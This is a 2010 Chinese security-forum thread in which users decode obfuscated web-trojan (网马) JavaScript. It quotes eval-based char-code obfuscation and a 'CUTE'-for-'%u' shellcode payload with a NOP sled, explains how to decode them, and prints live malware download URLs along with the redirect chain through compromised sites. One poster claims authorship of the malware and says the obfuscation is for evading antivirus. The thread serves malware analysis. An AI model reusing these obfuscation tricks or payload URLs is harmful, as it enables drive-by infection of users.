这个网马怎么解密？ bbs.ikaka.com

微米天空 - 2010-2-9 13:04:00

RT，请各位大大帮忙，告诉我方法，是什么加密的
题目见16楼

梦幻の星oо - 2010-2-9 13:16:00

好像是eval加密吧但是我还是没解出网马哦

ty88 - 2010-2-9 13:37:00

http://www.13the.cn/blackhole/muma.exe

ty88 - 2010-2-9 13:39:00

引用:

var sss = Array(590,485,570,160,495,585,580,505,565,565,160,305,160,585,550,505,575,495,485,560,505,200,560,485,605,540,555,485,500,230,570,505,560,540,485,495,505,200,235,335,425,420,345,235,515,320,160,170,185,585,170,205,205,295,160,550,555,560,575,540,505,500,160,305,160,585,550,505,575,495,485,560,505,200,170,185,585,240,485,240,485,185,585,240,485,240,485,170,205,295);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr = String.fromCharCode(sss/5); } var cc=arr.toString();cc=cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);

首先观察代码

此处的EVAL可以运行解密出来
得到
nullvar cuteqq = unescape(payload.replace(/CUTE/g, "%u")); nopsled = unescape("%u0a0a%u0a0a");
意思是上述代码中CUTE就是%u所以替换CUTE然后解密就OK了

注意下，shellcode需要按照顺序排列否则解密出来不能看

暗夜的雪 - 2010-2-9 13:47:00

http://www.13the.cn/blackhole/muma.exe
哇！开了眼界了很牛的加密方法啊
1、替换eavl()，在代码中可以看到unescape(payload.replace(/CUTE/g, "%u"))的代码，其中就告诉了我们要把CUTE字符串改成%u，这个正是解密方法的精髓。
2、用%u代替CUTE，用两次ESC转换得到http://www.1CUTE7433he.cn/blCUTE6361khole/CUTE756dma.exe（这仍然不是最后的网马地址）
3、注意其中还有CUTE字符串，继续替换为%u，再来两次ESC，才能最后得到网马地址：http://www.13the.cn/blackhole/muma.exe

做网马的人真是太狡猾了！！！:kaka10:

ty88 - 2010-2-9 13:50:00

其实不解密那代码也一样，经验多了看一眼就知道了:kaka1:

微米天空 - 2010-2-9 13:51:00

按照顺序排列是什么意思呢？我解密出来很乱的

[复制到剪贴板]

CODE:

a10="UTED0FFjWW?W钀http:/"w;
a11="fww.13the.cn/blCU";
a12="TE6361khole/CU";
payload =a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dma.exe";

微米天空 - 2010-2-9 13:53:00

明白了原来还要再替换解密啊·~

微米天空 - 2010-2-9 13:54:00

不错，厉害啊你！

遇上爱 - 2010-2-9 14:01:00

关于:解密的日志(全体输出 - 1):

Level 1>http://www.13the.cn/blackhole/muma.exe

日志由 Redoce2.0第70次修正版于 2010-2-9 13:56:27 生成。

payload = a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dCUTE616"+"dCUTE652eCUTE6578"+""+""+""+""+"";

另外那个替换%u的，如4楼所说
代码中有一段这样代码，你把a1到a12的全加起来，再加后面的那些，清楚引号和加号

暗夜的雪 - 2010-2-9 14:39:00

:kaka8: 在想一个问题~~ 既然网马地址反复出现~为啥不直接让公安局把那个网址给毙了呢~~~

暗夜的雪 - 2010-2-9 14:40:00

呵呵感觉这个做这个网马的人还挺有情趣的，一会儿cute一会儿muma的~~ 让人肉麻啊~ HOHO~:kaka12:

ty88 - 2010-2-9 14:41:00

你管得了一个管不住所有
你管住了一次管不住下一次

hqvip - 2010-2-9 15:08:00

代码里还有不雅词汇看来作者也是性情中人啊

Log is generated by FreShow.
[wide]http://www.xmhouse.com/HouseNews/kdpd/lskd/dwlskd/
[script]http://www.xmhouse.com/information/News/inc/getCount.js
[frame]http://www.xmhouse.com/HouseNews/kdpd/lskd/index_645.asp
[script]http://www.xmhouse.com/HouseNews/kdpd/lskd/dwlskd/ http://www.xmhouse.com/inc/tail.js
[script]http://www.13the.cn/blackhole/mm.js
[frame]http://www.13the.cn/blackhole/index.htm
[frame]http://www.13the.cn/blackhole/ie.html
[object]http://www.13the.cn/blackhole/muma.exe

辛达星郁 - 2010-2-9 15:11:00

shellcode需要按照顺序排列:\
这句话该怎么做。

微米天空 - 2010-2-9 19:27:00

hXXp://game.hsw.cn/skin/css/log.js 这个我解了很久就是解不出，
var CFFYT='CF';
var XXXxxyt='9';
var xxyytt='%';
var xxttyy='u';
var ttyyxx=xxyytt+xxttyy;
var ytaau='9';
var UUCK=ttyyxx+ytaau+'9'+'9'+'9'+ttyyxx+'9'+'9'+'9'+XXXxxyt;
这几个替换了也没出什么东西来，难道这个JS不带毒？

附件: code.txt

是昔流芳 - 2010-2-9 20:42:00

http://game.hsw.cn/skin/img/74.exe

遇上爱 - 2010-2-9 21:39:00

引用:

原帖由 微米天空 于 2010-2-9 19:27:00 发表
hXXp://game.hsw.cn/skin/css/log.js 这个我解了很久就是解不出，
var CFFYT='CF';
var XXXxxyt='9';
var xxyytt='%';
var xxttyy='u';
var ttyyxx=xxyytt+xxttyy;
var ytaau='9';
var UUCK=ttyyxx+ytaau+'9'......

关于:解密的日志(全体输出 - 1):

Level 1>hxxp://game.hsw.cn/skin/img/74.exe

日志由 Redoce2.0第70次修正版于 2010-2-9 21:41:02 生成。

ty88 - 2010-2-9 22:48:00

有的，那段SHELLCODE带有密匙
密匙是BD
不用密匙解不出的

DragonKid - 2010-2-10 0:29:00

老师
对于带有密钥的shellcode应该怎么做？？

是昔流芳 - 2010-2-10 8:42:00

1.调试
2.枚举
3.猜
4.放弃

筠林碧湫 - 2010-2-10 20:41:00

http://www.13the.cn/blackhole/muma.exe
用cude %u替换实在是挑战智商吗！！不过挺逗的

31756381 - 2010-4-10 15:37:00

http://www.13the.cn/blackhole/muma.exe 是下载者
真实地址不说
那个加来加去为了免杀
那些变量都是字符串把那些变量内的内容都拿出来就可以了:kaka7:
还有这J8网站是我的。。。

31756381 - 2010-4-10 15:38:00

我不狡猾
只不过为了免杀才这样做的哦:kaka6:

瑞星卡卡安全论坛